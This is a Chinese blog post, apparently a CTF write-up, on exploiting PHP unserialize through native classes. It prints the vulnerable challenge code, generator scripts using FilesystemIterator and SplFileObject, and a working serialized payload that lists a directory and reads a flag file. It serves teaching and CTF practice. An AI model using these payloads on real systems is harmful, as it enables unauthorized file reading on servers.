反序列化漏洞中的原生类利用

最新推荐文章于 2023-06-12 13:35:34 发布
最新推荐文章于 2023-06-12 13:35:34 发布
阅读量3.9k 收藏 2
点赞数 1
分类专栏: CTF 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46607055/article/details/121359749
版权

前言

ctf中代码审计反序列化的题目中,有时候给出的类没有可以利用的函数(类似eval)

这个时候该尝试调用php自带的原生类。

关于原生类有哪些,分别对应什么功能,可以看这个视频。

第二期培训:php原生类_哔哩哔哩_bilibili

例题

下面是一道反序列化的题目

<?php
error_reporting(0);

class catalogue{
    public $class;
    public $data;
    public function __construct() //构建类时调用。
    {
        $this->class = "error"; //用class属性调用下方自定义的error类
        $this->data = "hacker"; //将data的值赋值为hacker
    }
    public function __destruct()  //销毁类时调用(包括反序列化时)
    {
        echo new $this->class ($this->data); //用new方法新建一个类
    }
}
class error{
    public function __construct($OTL)  //构建类时会输出hello $OYL    (没啥用)
    {
        $this->OTL = $OTL;
        echo ("hello ".$this->OTL);
    }
}

if(isset($_GET['cata'])){
    unserialize($_GET['cata']);
}
else{
    highlight_file(__FILE__);
}
?>

这部分代码的意思就是

新建catalogue类的时候,会将data赋值为“hacker”,并且调用下方自定义的error类。

解题过程

这些都没有与服务器交互的内容,所以尝试调用 原生类

首先是  FilesystemIterator 类 读取文件夹下的文件

php代码

<?php
class catalogue{
    public $class = FilesystemIterator;
    public $data ="/ctf";
    public function __destruct()
    {
        echo new $this->class($this->data);
    }
}
$a =new catalogue;
echo serialize($a);
?>

让这个类销毁(执行反序列化)的时候,new一个名为FilesystemIterator的类,传入的数据是FilesystemIterator的参数,即路径( /ctf 是给出的 hint)。

查到有 f1Ag文件 。

 接下来用 SplFileObject 类读取文件

php代码

<?php
class catalogue{
    public $class = SplFileObject;
    public $data ="/ctf/f1Ag";
    public function __destruct()
    {
        echo new $this->class($this->data);
    }
}
$a =new catalogue;
echo serialize($a);
?>

销毁catalogue时,创建 读取文件的 SplFileObject类 ,传入的data是 /cat/f1Ag

最终payload

?cata=O:9:"catalogue":2:{s:5:"class";s:13:"SplFileObject";s:4:"data";s:9:"/ctf/f1Ag";}

m0_46607055
关注
专栏目录
【Java代码审计】反序列化漏洞
大河之犬的博客
03-25 1026
发送方必须将要发送的 Java 对象序列化为字节流,接收方则需要将字节流再反序列化,还原得到 Java 对象,才能实现正常通信。当攻击者输入精心构造的字节流被反序列化为恶意对象时,就会造成一系列的安全问题。在 Java 原生的API ,序列化的过程由的方法实现,反序列化过程由的方法实现。将字节流还原成对象的过程都可以称作反序列化,例如,JSON 串或 XML 串还原成对象的过程也是反序列化的过程。同理,将对象转化成 JSON 串或 XML 串的过程也是序列化的过程。
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3487
ysoserial这款工具,堪称为“java反序列利用神器”。
PHP原生利用
XINO
05-04 1708
原生,即php的内置ctf考过利用原生的考点 先贴一个脚本寻找php存在什么原生 <?php $classes = get_declared_classes(); foreach ($classes as $class) { $methods = get_class_methods($class); foreach ($methods as $method) { if (in_array($method, array( '__de
Shiro的Java原生反序列化漏洞
热门推荐
公众号shadow sock7
07-28 1万+
参考: http://www.lmxspace.com/2019/10/17/Shiro-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%AE%B0%E5%BD%95/ https://github.com/jas502n/Shiro_Xray 环境搭建 git clone https://github.com/apache/shiro.git # wget https://codeload.github.com/apache/shiro/zip/shiro-root-1
PHP原生及其利用
Elite的博客
03-23 587
简单易懂的PHP原生及其利用讲解
浅析php反序列化原生利用
Christ1na的博客
03-31 5262
浅析php原生利用
【技术推荐】WebLogic 反序列化漏洞深入分析
m0_73257876的博客
09-25 3254
WebLogic 漏洞存在较多的反序列化反序列化的途径,在使用黑名单防御手段下,攻击者只要找到新的反序列化触发点,就能造成新的危害。比如,你有一个 A,里面有个属性是 B,这个时候,在反序列化的过程,就会先反序列化 A,之后在填充 A 的过程,继续反序列化 B, B 在反序列化完成后,填充到 A ,同时整个过程都在一个流操作,这个时候,只要还是 ObjectOutStream 的 read_value进行反序列化操作就不能饶过黑名单!
反序列化漏洞汇总
hackzkaq的博客
12-08 5205
一.反序列化的基本内容 对象方法 (Class): 用来描述具有相同的属性和方法的对象的集合。 它定义了该集合每个对象所共有的属性和方法。对象是的实例。 对象:通过定义的数据结构实例。对象包括两个数据成员(变量和实例变量)和方法。 对象:某一个具体的事物、实体或事例 型,比如人,犬; 对象是某种的一个实例(实际的例子),比如身为人的你就是一个对象,你家养的狗就属于犬的一个对象,或者说一个实例; 你可能经常会听到“实例化对象”,这句话的意思就是创建对象,此处的实例名词作动词用,作名
【网络安全】Nacos Client Yaml反序列化漏洞分析
HBohan的博客
10-15 5943
背景 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。 Nacos是阿里巴巴于2018年开源的项目,目前在Github已获得 19.8kSt,由此可见其的使用广泛程度。 未授权访问漏洞 threedr3am师傅在去年十二月份的时候在Github上.
WEB攻防-通用漏洞&PHP反序列化&POP链构造&魔术方法&原生
m0_65336233的博客
10-18 385
WEB攻防-通用漏洞&PHP反序列化&POP链构造&魔术方法&原生
Day46 PHP反序列化&原生&漏洞绕过&公私有属性
wanjia01的博客
01-17 794
当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。// __isset():当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。/*__get() 魔术方法 读取一个对象的属性时,若属性存在,则直接返回属性值;/*__unset():在不可访问的属性上使用unset()时触发 销毁对象的某个属性时执行此函数。// _invoke():以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。
CTFshow-WEB入门-反序列化
feng的博客
02-14 5649
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
反序列化PHP原生利用
3569
03-18 1672
http://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html文章围绕着一个问题,如果在代码审计反序列化点,但是在原本的代码找不到pop链该如何?N1CTF有一个无pop链的反序列化的题目,其就是找到php内置来进行反序列化。基础知识首先还是来回顾一下序列化的魔术方法,下面也将以此进行分来进行研...
反序列化 php 原生,反序列化PHP原生利用
weixin_30844407的博客
04-10 464
目录正文文章围绕着一个问题,如果在代码审计反序列化点,但是在原本的代码找不到pop链该如何?N1CTF有一个无pop链的反序列化的题目,其就是找到php内置来进行反序列化。回到顶部基础知识首先还是来回顾一下序列化的魔术方法,下面也将以此进行分来进行研究。当对象被创建的时候调用:__construct当对象被销毁的时候调用:__destruct当对象被当作一个字符串使用时候调用(不仅仅...
原生
dazigeng4522的博客
09-29 254
今天做笔试题时发现了一个概念,查阅了文档之后才明白,原生的存在,慢慢学习慢慢进步吧! Java,数据型分为基本数据型(或叫做原生、内置型)和引用数据型。 Java不是纯的面向对象的语言,不纯的地方就是这些基本数据型不是对象。当然初期Java的运行速度很慢,但是基本数据型能在一定程度上改善性能。如果你想编写纯的面向对象的程序,用包装器是取代基本数...
CTF常用的php原生总结
最新发布
记录学习,一起进步
06-12 3447
CTF常用的php原生总结
ctfshow反序列化 wp
yink12138的博客
01-04 2778
ctfshow反序列化wp
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值